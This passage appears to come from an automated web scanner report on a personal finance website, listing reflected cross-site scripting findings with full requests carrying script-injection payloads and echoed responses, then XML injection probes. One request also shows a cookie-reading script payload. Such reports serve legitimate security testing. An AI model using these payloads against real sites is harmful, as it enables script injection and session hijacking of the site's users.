Date: Thu, 03 Feb 2011 17:04:39 GMT
Content-Length: 13301
Connection: close
Set-Cookie: adc=RSP; path=/;

<!DOCTYPE html>
<html xmlns:fb="http://www.facebook.com/2008/fbml">

<head>
   <meta http-equiv="Content-Type" content="text/html; charset=utf-8" />
   <meta name="generator" content="1b0d0ec2fefe4b82a285
...[SNIP]...
<a target="_blank" href="http://twitter.com/home?status=Check out this 'Don't Forget About Inflation Risk' on 'MyFinances.com'! 'http://www.myfinances.com/blog/3299523.html?7dffd"><script>alert(1)</script>ccc9f3547f8=1'">
...[SNIP]...

1.11. http://www.myfinances.com/blog/3299533.html [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.myfinances.com
Path:   /blog/3299533.html

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 3cbc8"><script>alert(1)</script>473ebcbf25d was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /blog/3299533.html?3cbc8"><script>alert(1)</script>473ebcbf25d=1 HTTP/1.1
Host: www.myfinances.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: acache=0f6ad7bba76fc105e776602dd2eeebb59a5e65ef-96bb1dfba832b3d02f58633d63038a24dcfab136; PHPSESSID=i38rv6rueenlkehkfpegmlf4q3; ARPT=VRWOZXS192.168.100.27CKOUJ; adc=RSP; uvx=ogz9gkn6ApsPfhYM2mO-erklLaxNIV-BVXrW6aRo-n_AJPK2QUOhd0Abjk7C8k0uK8mLPFc-LluxlSpLwBNV_0YhxlQO-o-kf_in1Ri2_CHOcsANvX5k8_r8Rvq_KR_GreyyNfUIbjPAxBUpoNm3wdKSMBYXqgLeYEENLOWsxn5Eble1QxvJLK-74N00-QORgnctmlpQA6dRDOE8qtWYP74CTEiWPaQLH4pwjPOr-md8j6Mr45xQnasoZwBdSfN83QxsFl1X1Wt1Pn-aDBqzVVZjTCYnXgCL;

Response

HTTP/1.1 200 OK
Server: Apache
P3P: policyref="http://www.myfinances.com/xml/p3p.xml", CP="CURa ADMa DEVa PSAo PSDo OUR IND UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Content-Type: text/html; charset=UTF-8
Expires: Thu, 03 Feb 2011 17:04:56 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Thu, 03 Feb 2011 17:04:56 GMT
Content-Length: 13628
Connection: close
Set-Cookie: adc=RSP; path=/;

<!DOCTYPE html>
<html xmlns:fb="http://www.facebook.com/2008/fbml">

<head>
   <meta http-equiv="Content-Type" content="text/html; charset=utf-8" />
   <meta name="generator" content="1b0d0ec2fefe4b82a285
...[SNIP]...
a target="_blank" href="http://twitter.com/home?status=Check out this 'Who is JTWROS and Why are They Listed on My Account Statement?' on 'MyFinances.com'! 'http://www.myfinances.com/blog/3299533.html?3cbc8"><script>alert(1)</script>473ebcbf25d=1'">
...[SNIP]...

1.12. http://www.myfinances.com/blog/3299543.html [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.myfinances.com
Path:   /blog/3299543.html

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 86ca0"><script>alert(1)</script>6a9de3808f3 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /blog/3299543.html?86ca0"><script>alert(1)</script>6a9de3808f3=1 HTTP/1.1
Host: www.myfinances.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: acache=0f6ad7bba76fc105e776602dd2eeebb59a5e65ef-96bb1dfba832b3d02f58633d63038a24dcfab136; PHPSESSID=i38rv6rueenlkehkfpegmlf4q3; ARPT=VRWOZXS192.168.100.27CKOUJ; adc=RSP; uvx=ogz9gkn6ApsPfhYM2mO-erklLaxNIV-BVXrW6aRo-n_AJPK2QUOhd0Abjk7C8k0uK8mLPFc-LluxlSpLwBNV_0YhxlQO-o-kf_in1Ri2_CHOcsANvX5k8_r8Rvq_KR_GreyyNfUIbjPAxBUpoNm3wdKSMBYXqgLeYEENLOWsxn5Eble1QxvJLK-74N00-QORgnctmlpQA6dRDOE8qtWYP74CTEiWPaQLH4pwjPOr-md8j6Mr45xQnasoZwBdSfN83QxsFl1X1Wt1Pn-aDBqzVVZjTCYnXgCL;

Response

HTTP/1.1 200 OK
Server: Apache
P3P: policyref="http://www.myfinances.com/xml/p3p.xml", CP="CURa ADMa DEVa PSAo PSDo OUR IND UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Content-Type: text/html; charset=UTF-8
Expires: Thu, 03 Feb 2011 17:05:03 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Thu, 03 Feb 2011 17:05:03 GMT
Content-Length: 13601
Connection: close
Set-Cookie: adc=RSP; path=/;

<!DOCTYPE html>
<html xmlns:fb="http://www.facebook.com/2008/fbml">

<head>
   <meta http-equiv="Content-Type" content="text/html; charset=utf-8" />
   <meta name="generator" content="1b0d0ec2fefe4b82a285
...[SNIP]...
<a target="_blank" href="http://twitter.com/home?status=Check out this 'How to Choose an Appropriate Target Date Fund' on 'MyFinances.com'! 'http://www.myfinances.com/blog/3299543.html?86ca0"><script>alert(1)</script>6a9de3808f3=1'">
...[SNIP]...

1.13. http://www.myfinances.com/blog/3299553.html [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.myfinances.com
Path:   /blog/3299553.html

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload f745d"><script>alert(1)</script>799a50af86f was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /blog/3299553.html?f745d"><script>alert(1)</script>799a50af86f=1 HTTP/1.1
Host: www.myfinances.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: acache=0f6ad7bba76fc105e776602dd2eeebb59a5e65ef-96bb1dfba832b3d02f58633d63038a24dcfab136; PHPSESSID=i38rv6rueenlkehkfpegmlf4q3; ARPT=VRWOZXS192.168.100.27CKOUJ; adc=RSP; uvx=ogz9gkn6ApsPfhYM2mO-erklLaxNIV-BVXrW6aRo-n_AJPK2QUOhd0Abjk7C8k0uK8mLPFc-LluxlSpLwBNV_0YhxlQO-o-kf_in1Ri2_CHOcsANvX5k8_r8Rvq_KR_GreyyNfUIbjPAxBUpoNm3wdKSMBYXqgLeYEENLOWsxn5Eble1QxvJLK-74N00-QORgnctmlpQA6dRDOE8qtWYP74CTEiWPaQLH4pwjPOr-md8j6Mr45xQnasoZwBdSfN83QxsFl1X1Wt1Pn-aDBqzVVZjTCYnXgCL;

Response

HTTP/1.1 200 OK
Server: Apache
P3P: policyref="http://www.myfinances.com/xml/p3p.xml", CP="CURa ADMa DEVa PSAo PSDo OUR IND UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Content-Type: text/html; charset=UTF-8
Expires: Thu, 03 Feb 2011 17:04:54 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Thu, 03 Feb 2011 17:04:54 GMT
Content-Length: 13663
Connection: close
Set-Cookie: adc=RSP; path=/;

<!DOCTYPE html>
<html xmlns:fb="http://www.facebook.com/2008/fbml">

<head>
   <meta http-equiv="Content-Type" content="text/html; charset=utf-8" />
   <meta name="generator" content="1b0d0ec2fefe4b82a285
...[SNIP]...
<a target="_blank" href="http://twitter.com/home?status=Check out this 'How To Choose Between a Traditional 401(K) and a Roth 401(K)' on 'MyFinances.com'! 'http://www.myfinances.com/blog/3299553.html?f745d"><script>alert(1)</script>799a50af86f=1'">
...[SNIP]...

1.14. http://www.myfinances.com/budget.php [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.myfinances.com
Path:   /budget.php

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 91d41"><script>alert(1)</script>3d8e0c43e90 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /budget.php?91d41"><script>alert(1)</script>3d8e0c43e90=1 HTTP/1.1
Host: www.myfinances.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: Apache
P3P: policyref="http://www.myfinances.com/xml/p3p.xml", CP="CURa ADMa DEVa PSAo PSDo OUR IND UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Content-Type: text/html; charset=UTF-8
Expires: Thu, 03 Feb 2011 15:55:20 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Thu, 03 Feb 2011 15:55:20 GMT
Content-Length: 21653
Connection: close
Set-Cookie: ARPT=VRWOZXS192.168.100.28CKOUU; path=/
Set-Cookie: PHPSESSID=r5fgdi9rsbvhrv1uang897d6f7; path=/
Set-Cookie: acache=0f6ad7bba76fc105e776602dd2eeebb59a5e65ef-96bb1dfba832b3d02f58633d63038a24dcfab136
Set-Cookie: uvx=ogz9gkn6ApsPfhYM2mO-ep3Zgx3x55wzjtYGmmA8IHHkMtnMePS5Wjisha7wpvxzTpOwlpCxTnjUY2Nzh3vrxUYhxlQO-o-kf_in1Ri2_CHOcsANvX5k8_r8Rvq_KR_GxkrTkausPQKB8ZM44-LhR9KSMBYXqgLeYEENLOWsxn5Eble1QxvJLK-74N00-QORAImKB8G3bn7X_rYpwmUw7b4CTEiWPaQLH4pwjPOr-mcyYKvi6WopOasoZwBdSfN83QxsFl1X1Wt1Pn-aDBqzVVZjTCYnXgCL; expires=Wed, 03-Feb-2021 06:00:00 GMT; path=/
Set-Cookie: uvx=ogz9gkn6ApsPfhYM2mO-ep3Zgx3x55wzjtYGmmA8IHHkMtnMePS5Wjisha7wpvxzTpOwlpCxTnjUY2Nzh3vrxUYhxlQO-o-kf_in1Ri2_CHOcsANvX5k8_r8Rvq_KR_GxkrTkausPQKB8ZM44-LhR9KSMBYXqgLeYEENLOWsxn5Eble1QxvJLK-74N00-QORAImKB8G3bn7X_rYpwmUw7b4CTEiWPaQLH4pwjPOr-md8j6Mr45xQnasoZwBdSfN83QxsFl1X1Wt1Pn-aDBqzVVZjTCYnXgCL; expires=Wed, 03-Feb-2021 06:00:00 GMT; path=/
Set-Cookie: uvx=ogz9gkn6ApsPfhYM2mO-ep3Zgx3x55wzjtYGmmA8IHHkMtnMePS5Wjisha7wpvxzTpOwlpCxTnjUY2Nzh3vrxUYhxlQO-o-kf_in1Ri2_CHOcsANvX5k8_r8Rvq_KR_GxkrTkausPQKB8ZM44-LhR9KSMBYXqgLeYEENLOWsxn5Eble1QxvJLK-74N00-QORAImKB8G3bn7X_rYpwmUw7b4CTEiWPaQLH4pwjPOr-md8j6Mr45xQnasoZwBdSfN83QxsFl1X1Wt1Pn-aDBqzVVZjTCYnXgCL; expires=Wed, 03-Feb-2021 06:00:00 GMT; path=/
Set-Cookie: adc=RSP; path=/;

<!DOCTYPE html>
<html xmlns:fb="http://www.facebook.com/2008/fbml">

<head>
   <meta http-equiv="Content-Type" content="text/html; charset=utf-8" />
   <meta name="generator" content="1b0d0ec2fefe4b82a285
...[SNIP]...
<input type="hidden" name="back" value="/budget.php?91d41"><script>alert(1)</script>3d8e0c43e90=1" />
...[SNIP]...

1.15. http://www.myfinances.com/budget.php [query parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.myfinances.com
Path:   /budget.php

Issue detail

The value of the query request parameter is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload e9843'><script>alert(1)</script>2707c201b22 was submitted in the query parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Request

GET /budget.php?query=savings+accountse9843'><script>alert(1)</script>2707c201b22&mfid=mf-4d404e8fe4f0d&mfs=adwc&&client=ca-dp-r-mark03_3ph_js HTTP/1.1
Host: www.myfinances.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response (redirected)

HTTP/1.1 200 OK
Server: Apache
P3P: policyref="http://www.myfinances.com/xml/p3p.xml", CP="CURa ADMa DEVa PSAo PSDo OUR IND UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Content-Type: text/html; charset=UTF-8
Expires: Thu, 03 Feb 2011 15:55:41 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Thu, 03 Feb 2011 15:55:41 GMT
Content-Length: 19651
Connection: close
Set-Cookie: ARPT=VRWOZXS192.168.100.28CKOUU; path=/
Set-Cookie: PHPSESSID=8mri1qtefnba9k49k4ep3nl8h2; path=/
Set-Cookie: acache=0f6ad7bba76fc105e776602dd2eeebb59a5e65ef-96bb1dfba832b3d02f58633d63038a24dcfab136
Set-Cookie: uvx=ogz9gkn6ApsPfhYM2mO-eno6Jjl93N8GpduxNYGBxG5Y6FFxht_Njk7BPyPmzIQKHUnSLStdd3m_SBtFRIWv2UYhxlQO-o-kf_in1Ri2_CHOcsANvX5k8_r8Rvq_KR_GxkrTkausPQJMGm4g2vKixNKSMBYXqgLeYEENLOWsxn5Eble1QxvJLK-74N00-QORAImKB8G3bn5Ae7198oJNXL4CTEiWPaQLH4pwjPOr-mcyYKvi6WopOasoZwBdSfN83QxsFl1X1Wt1Pn-aDBqzVVZjTCYnXgCL; expires=Wed, 03-Feb-2021 06:00:00 GMT; path=/
Set-Cookie: uvx=ogz9gkn6ApsPfhYM2mO-eno6Jjl93N8GpduxNYGBxG5Y6FFxht_Njk7BPyPmzIQKHUnSLStdd3m_SBtFRIWv2UYhxlQO-o-kf_in1Ri2_CHOcsANvX5k8_r8Rvq_KR_GxkrTkausPQJMGm4g2vKixNKSMBYXqgLeYEENLOWsxn5Eble1QxvJLK-74N00-QORAImKB8G3bn5Ae7198oJNXL4CTEiWPaQLH4pwjPOr-md8j6Mr45xQnasoZwBdSfN83QxsFl1X1Wt1Pn-aDBqzVVZjTCYnXgCL; expires=Wed, 03-Feb-2021 06:00:00 GMT; path=/
Set-Cookie: uvx=ogz9gkn6ApsPfhYM2mO-eno6Jjl93N8GpduxNYGBxG5Y6FFxht_Njk7BPyPmzIQKHUnSLStdd3m_SBtFRIWv2UYhxlQO-o-kf_in1Ri2_CHOcsANvX5k8_r8Rvq_KR_GxkrTkausPQJMGm4g2vKixNKSMBYXqgLeYEENLOWsxn5Eble1QxvJLK-74N00-QORAImKB8G3bn5Ae7198oJNXL4CTEiWPaQLH4pwjPOr-md8j6Mr45xQnasoZwBdSfN83QxsFl1X1Wt1Pn-aDBqzVVZjTCYnXgCL; expires=Wed, 03-Feb-2021 06:00:00 GMT; path=/
Set-Cookie: adc=RSP; path=/;

<!DOCTYPE html>
<html xmlns:fb="http://www.facebook.com/2008/fbml">

<head>
   <meta http-equiv="Content-Type" content="text/html; charset=utf-8" />
   <meta name="generator" content="1b0d0ec2fefe4b82a285
...[SNIP]...
<input type='text' id='keyword' name='keyword' title='savings accountse9843'><script>alert(1)</script>2707c201b22' value ='savings accountse9843'>
...[SNIP]...

1.16. http://www.myfinances.com/budget.php [query parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.myfinances.com
Path:   /budget.php

Issue detail

The value of the query request parameter is copied into the HTML document as plain text between tags. The payload a2ce6<script>alert(1)</script>826352099bb was submitted in the query parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Request

GET /budget.php?query=savings+accountsa2ce6<script>alert(1)</script>826352099bb&mfid=mf-4d404e8fe4f0d&mfs=adwc&&client=ca-dp-r-mark03_3ph_js HTTP/1.1
Host: www.myfinances.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response (redirected)

HTTP/1.1 200 OK
Server: Apache
P3P: policyref="http://www.myfinances.com/xml/p3p.xml", CP="CURa ADMa DEVa PSAo PSDo OUR IND UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Content-Type: text/html; charset=UTF-8
Expires: Thu, 03 Feb 2011 15:55:45 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Thu, 03 Feb 2011 15:55:45 GMT
Content-Length: 19629
Connection: close
Set-Cookie: ARPT=VRWOZXS192.168.100.26CKOUQ; path=/
Set-Cookie: PHPSESSID=u15624i2oae1adjjrl0fa5mn65; path=/
Set-Cookie: acache=0f6ad7bba76fc105e776602dd2eeebb59a5e65ef-96bb1dfba832b3d02f58633d63038a24dcfab136
Set-Cookie: uvx=ogz9gkn6ApsPfhYM2mO-enLhu7KjEvXpkJfrfAQOnZ1eEyEUcIq0WVmXir4NGwcZbmUHGK2l4Dwd73MuXjqeOUYhxlQO-o-kf_in1Ri2_CHOcsANvX5k8_r8Rvq_KR_GxkrTkausPQJ6pTPd4ZzeqNKSMBYXqgLeYEENLOWsxn5Eble1QxvJLK-74N00-QORAImKB8G3bn6nygrYAfQJ-r4CTEiWPaQLH4pwjPOr-mcyYKvi6WopOasoZwBdSfN83QxsFl1X1Wt1Pn-aDBqzVVZjTCYnXgCL; expires=Wed, 03-Feb-2021 06:00:00 GMT; path=/
Set-Cookie: uvx=ogz9gkn6ApsPfhYM2mO-enLhu7KjEvXpkJfrfAQOnZ1eEyEUcIq0WVmXir4NGwcZbmUHGK2l4Dwd73MuXjqeOUYhxlQO-o-kf_in1Ri2_CHOcsANvX5k8_r8Rvq_KR_GxkrTkausPQJ6pTPd4ZzeqNKSMBYXqgLeYEENLOWsxn5Eble1QxvJLK-74N00-QORAImKB8G3bn6nygrYAfQJ-r4CTEiWPaQLH4pwjPOr-md8j6Mr45xQnasoZwBdSfN83QxsFl1X1Wt1Pn-aDBqzVVZjTCYnXgCL; expires=Wed, 03-Feb-2021 06:00:00 GMT; path=/
Set-Cookie: uvx=ogz9gkn6ApsPfhYM2mO-enLhu7KjEvXpkJfrfAQOnZ1eEyEUcIq0WVmXir4NGwcZbmUHGK2l4Dwd73MuXjqeOUYhxlQO-o-kf_in1Ri2_CHOcsANvX5k8_r8Rvq_KR_GxkrTkausPQJ6pTPd4ZzeqNKSMBYXqgLeYEENLOWsxn5Eble1QxvJLK-74N00-QORAImKB8G3bn6nygrYAfQJ-r4CTEiWPaQLH4pwjPOr-md8j6Mr45xQnasoZwBdSfN83QxsFl1X1Wt1Pn-aDBqzVVZjTCYnXgCL; expires=Wed, 03-Feb-2021 06:00:00 GMT; path=/
Set-Cookie: adc=RSP; path=/;

<!DOCTYPE html>
<html xmlns:fb="http://www.facebook.com/2008/fbml">

<head>
   <meta http-equiv="Content-Type" content="text/html; charset=utf-8" />
   <meta name="generator" content="1b0d0ec2fefe4b82a285
...[SNIP]...
<h2>Results for &lsquo;savings accountsa2ce6<script>alert(1)</script>826352099bb&rsquo;</h2>
...[SNIP]...

1.17. http://www.myfinances.com/contact.html [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.myfinances.com
Path:   /contact.html

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload 613cb'><script>alert(1)</script>8f2541e63ae was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /contact.html?613cb'><script>alert(1)</script>8f2541e63ae=1 HTTP/1.1
Host: www.myfinances.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: acache=0f6ad7bba76fc105e776602dd2eeebb59a5e65ef-96bb1dfba832b3d02f58633d63038a24dcfab136; PHPSESSID=i38rv6rueenlkehkfpegmlf4q3; ARPT=VRWOZXS192.168.100.27CKOUJ; adc=RSP; uvx=ogz9gkn6ApsPfhYM2mO-erklLaxNIV-BVXrW6aRo-n_AJPK2QUOhd0Abjk7C8k0uK8mLPFc-LluxlSpLwBNV_0YhxlQO-o-kf_in1Ri2_CHOcsANvX5k8_r8Rvq_KR_GreyyNfUIbjPAxBUpoNm3wdKSMBYXqgLeYEENLOWsxn5Eble1QxvJLK-74N00-QORgnctmlpQA6dRDOE8qtWYP74CTEiWPaQLH4pwjPOr-md8j6Mr45xQnasoZwBdSfN83QxsFl1X1Wt1Pn-aDBqzVVZjTCYnXgCL;

Response

HTTP/1.1 200 OK
Server: Apache
P3P: policyref="http://www.myfinances.com/xml/p3p.xml", CP="CURa ADMa DEVa PSAo PSDo OUR IND UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Content-Type: text/html; charset=UTF-8
Expires: Thu, 03 Feb 2011 17:02:44 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Thu, 03 Feb 2011 17:02:44 GMT
Content-Length: 8051
Connection: close
Set-Cookie: adc=RSP; path=/;

<!DOCTYPE html>
<html xmlns:fb="http://www.facebook.com/2008/fbml">

<head>
   <meta http-equiv="Content-Type" content="text/html; charset=utf-8" />
   <meta name="generator" content="1b0d0ec2fefe4b82a285
...[SNIP]...
<form class='form' enctype='multipart/form-data' action='/contact.html?613cb'><script>alert(1)</script>8f2541e63ae=1' method='post' >
...[SNIP]...

2. XML injection  previous  next
There are 4 instances of this issue:

Issue background

XML or SOAP injection vulnerabilities arise when user input is inserted into a server-side XML document or SOAP message in an unsafe way. It may be possible to use XML metacharacters to modify the structure of the resulting XML. Depending on the function in which the XML is used, it may be possible to interfere with the application's logic, to perform unauthorised actions or access sensitive data.

This kind of vulnerability can be difficult to detect and exploit remotely; you should review the application's response, and the purpose which the relevant input performs within the application's functionality, to determine whether it is indeed vulnerable.

Issue remediation

The application should validate or sanitise user input before incorporating it into an XML document or SOAP message. It may be possible to block any input containing XML metacharacters such as < and >. Alternatively, these characters can be replaced with the corresponding entities: &lt; and &gt;.


2.1. http://www.myfinances.com/solo [REST URL parameter 1]  previous  next

Summary

Severity:   Medium
Confidence:   Tentative
Host:   http://www.myfinances.com
Path:   /solo

Issue detail

The REST URL parameter 1 appears to be vulnerable to XML injection. The payload ]]>> was appended to the value of the REST URL parameter 1. The application's response indicated that this input may have caused an error within a server-side XML or SOAP parser, suggesting that the input has been inserted into an XML document or SOAP message without proper sanitisation.

Request

GET /solo]]>>?module=facebook/login&message_num=2 HTTP/1.1
Host: www.myfinances.com
Proxy-Connection: keep-alive
Referer: http://www.myfinances.com/budget.php?91d41%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E3d8e0c43e90=1
X-Requested-With: XMLHttpRequest
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ARPT=VRWOZXS192.168.100.27CKOUJ; PHPSESSID=i38rv6rueenlkehkfpegmlf4q3; acache=0f6ad7bba76fc105e776602dd2eeebb59a5e65ef-96bb1dfba832b3d02f58633d63038a24dcfab136; uvx=ogz9gkn6ApsPfhYM2mO-erklLaxNIV-BVXrW6aRo-n_AJPK2QUOhd0Abjk7C8k0uK8mLPFc-LluxlSpLwBNV_0YhxlQO-o-kf_in1Ri2_CHOcsANvX5k8_r8Rvq_KR_GreyyNfUIbjPAxBUpoNm3wdKSMBYXqgLeYEENLOWsxn5Eble1QxvJLK-74N00-QORgnctmlpQA6dRDOE8qtWYP74CTEiWPaQLH4pwjPOr-md8j6Mr45xQnasoZwBdSfN83QxsFl1X1Wt1Pn-aDBqzVVZjTCYnXgCL; adc=RSP

Response

HTTP/1.1 200 OK
Server: Apache
P3P: policyref="http://www.myfinances.com/xml/p3p.xml", CP="CURa ADMa DEVa PSAo PSDo OUR IND UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Content-Type: text/html; charset=UTF-8
Expires: Thu, 03 Feb 2011 16:26:51 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Thu, 03 Feb 2011 16:26:51 GMT
Connection: close
Vary: Accept-Encoding
Set-Cookie: adc=RSP; path=/;
Content-Length: 6533

<!DOCTYPE html>
<html xmlns:fb="http://www.facebook.com/2008/fbml">

<head>
   <meta http-equiv="Content-Type" content="text/html; charset=utf-8" />
   <meta name="generator" content="1b0d0ec2fefe4b82a285
...[SNIP]...
<!-- START listxml Partial -->
...[SNIP]...

2.2. http://www.myfinances.com/solo/form/dispatcher [REST URL parameter 1]  previous  next

Summary

Severity:   Medium
Confidence:   Tentative
Host:   http://www.myfinances.com
Path:   /solo/form/dispatcher

Issue detail

The REST URL parameter 1 appears to be vulnerable to XML injection. The payload ]]>> was appended to the value of the REST URL parameter 1. The application's response indicated that this input may have caused an error within a server-side XML or SOAP parser, suggesting that the input has been inserted into an XML document or SOAP message without proper sanitisation.

Request

GET /solo]]>>/form/dispatcher HTTP/1.1
Host: www.myfinances.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: acache=0f6ad7bba76fc105e776602dd2eeebb59a5e65ef-96bb1dfba832b3d02f58633d63038a24dcfab136; PHPSESSID=i38rv6rueenlkehkfpegmlf4q3; ARPT=VRWOZXS192.168.100.27CKOUJ; adc=RSP; uvx=ogz9gkn6ApsPfhYM2mO-erklLaxNIV-BVXrW6aRo-n_AJPK2QUOhd0Abjk7C8k0uK8mLPFc-LluxlSpLwBNV_0YhxlQO-o-kf_in1Ri2_CHOcsANvX5k8_r8Rvq_KR_GreyyNfUIbjPAxBUpoNm3wdKSMBYXqgLeYEENLOWsxn5Eble1QxvJLK-74N00-QORgnctmlpQA6dRDOE8qtWYP74CTEiWPaQLH4pwjPOr-md8j6Mr45xQnasoZwBdSfN83QxsFl1X1Wt1Pn-aDBqzVVZjTCYnXgCL;

Response

HTTP/1.1 200 OK
Server: Apache
P3P: policyref="http://www.myfinances.com/xml/p3p.xml", CP="CURa ADMa DEVa PSAo PSDo OUR IND UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Content-Type: text/html; charset=UTF-8
Expires: Thu, 03 Feb 2011 17:04:42 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Thu, 03 Feb 2011 17:04:42 GMT
Content-Length: 6490
Connection: close
Set-Cookie: adc=RSP; path=/;

<!DOCTYPE html>
<html xmlns:fb="http://www.facebook.com/2008/fbml">

<head>
   <meta http-equiv="Content-Type" content="text/html; charset=utf-8" />
   <meta name="generator" content="1b0d0ec2fefe4b82a285
...[SNIP]...
<!-- START listxml Partial -->
...[SNIP]...

2.3. http://www.myfinances.com/solo/form/dispatcher [REST URL parameter 2]  previous  next

Summary

Severity:   Medium
Confidence:   Tentative
Host:   http://www.myfinances.com
Path:   /solo/form/dispatcher

Issue detail

The REST URL parameter 2 appears to be vulnerable to XML injection. The payload ]]>> was appended to the value of the REST URL parameter 2. The application's response indicated that this input may have caused an error within a server-side XML or SOAP parser, suggesting that the input has been inserted into an XML document or SOAP message without proper sanitisation.

Request

GET /solo/form]]>>/dispatcher HTTP/1.1
Host: www.myfinances.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: acache=0f6ad7bba76fc105e776602dd2eeebb59a5e65ef-96bb1dfba832b3d02f58633d63038a24dcfab136; PHPSESSID=i38rv6rueenlkehkfpegmlf4q3; ARPT=VRWOZXS192.168.100.27CKOUJ; adc=RSP; uvx=ogz9gkn6ApsPfhYM2mO-erklLaxNIV-BVXrW6aRo-n_AJPK2QUOhd0Abjk7C8k0uK8mLPFc-LluxlSpLwBNV_0YhxlQO-o-kf_in1Ri2_CHOcsANvX5k8_r8Rvq_KR_GreyyNfUIbjPAxBUpoNm3wdKSMBYXqgLeYEENLOWsxn5Eble1QxvJLK-74N00-QORgnctmlpQA6dRDOE8qtWYP74CTEiWPaQLH4pwjPOr-md8j6Mr45xQnasoZwBdSfN83QxsFl1X1Wt1Pn-aDBqzVVZjTCYnXgCL;

Response

HTTP/1.1 200 OK
Server: Apache
P3P: policyref="http://www.myfinances.com/xml/p3p.xml", CP="CURa ADMa DEVa PSAo PSDo OUR IND UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Content-Type: text/html; charset=UTF-8
Expires: Thu, 03 Feb 2011 17:04:53 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
